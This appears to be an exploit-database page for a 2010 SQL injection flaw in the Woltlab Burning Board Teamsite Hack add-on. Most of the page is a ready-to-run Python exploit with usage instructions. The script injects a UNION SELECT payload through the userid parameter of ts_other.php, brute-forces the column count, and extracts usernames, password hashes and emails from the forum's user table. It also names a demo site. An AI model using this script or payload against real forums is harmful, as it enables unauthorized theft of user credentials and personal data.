Woltlab Burning Board Teamsite Hack V3.0 ts_other.php SQL Injection

2010.04.14
Credit: Easy Laster
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


Ogólna skala CVSS: 7.5/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

----------------------------Information----------------------------------------------------- +Name : Woltlab Burning Board Teamsite Hack V3.0 ts_other.php SQL Injection Exploit (Python) +Autor : Easy Laster +Date : 21.03.2010 +Script : Woltlab Burning Board Teamsite Hack V3.0 +Google Door : Teamsite Hack V3.0 by Blue -- Robis-Forum +Download : http://www.robertotto.de/ +Demo : http://www.poldis-spielewelt.de/wbb2/ +Price : Woltlab Burning Board Lizenz +Language :PHP +Discovered by Easy Laster +Security Group 4004-Security-Project +Greetz to Team-Internet ,Underground Agents +And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok, Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge, N00bor,Ic3Drag0n,novaca!ne. --------------------------------------------------------------------------------------------- ___ ___ ___ ___ _ _ _____ _ _ | | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_ |_ | | | | |_ |___|_ -| -_| _| | | _| | _| | |___| __| _| . | | | -_| _| _| |_|___|___| |_| |___|___|___|___|_| |_|_| |_ | |__| |_| |___|_| |___|___|_| |___| |___| --------------------------------------------------------------------------------------------- #!/usr/bin/env python #-*- coding:utf-8 -*- import sys, urllib2, re if len(sys.argv) < 2: print "***************************************************************" print "*****Woltlab Board Burning Board Teamsite Hack V2.0 ***********" print "***************************************************************" print "* Discovered and vulnerability by Easy Laster *" print "* coded by Dr.ChAoS *" print "* *" print "* <=Usage=> *" print "* python exploit.py http://site.de/forum/ <userid, default=1> *" print "* *" print "***************************************************************" exit() if len(sys.argv) < 3: id = 1 else: id = sys.argv[2] forum = sys.argv[1] if forum[-1:] != "/": forum += "/" urlPart1 = forum + "ts_other.php?action=modboard&userid=1111111'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,concat(userid,0x3a,username,0x3a,password,0x3a,email),24,23,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55" urlPart2 = "+from+bb1_users+where+userid=" + str(id) + "--+" columns = "" print "Exploiting..." for i in range(10): html = urllib2.urlopen(urlPart1 + columns + urlPart2).read() ##I hate regex! res = re.findall(r">([1-9])\:(.*)\:(.*)<", html) if len(res) > 0: userID = res[0][0] userData = res[0][1].rsplit(":", 1) email = res[0][2].split("<")[0] print "Success!\n" print "ID: " + str(userID) print "Username: " + userData[0] print "Password: " + userData[1] print "E-Mail: " + str(email) print "\nHave a nice day!" exit() columns += ",1" print "Exploit failed..."

Referencje:

http://xforce.iss.net/xforce/xfdb/57066
http://www.securityfocus.com/bid/38870
http://www.exploit-db.com/exploits/11824
http://secunia.com/advisories/39009
http://packetstormsecurity.org/1003-exploits/woltlabb-sql.txt
http://osvdb.org/63126
http://445544.44.ohost.de/worldlabburningboardadon2python-1.txt
http://4004securityproject.wordpress.com/2010/03/22/woltlab-burning-board-teamsite-hack-v3-0-ts_other-php-sql-injection-exploit-2/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top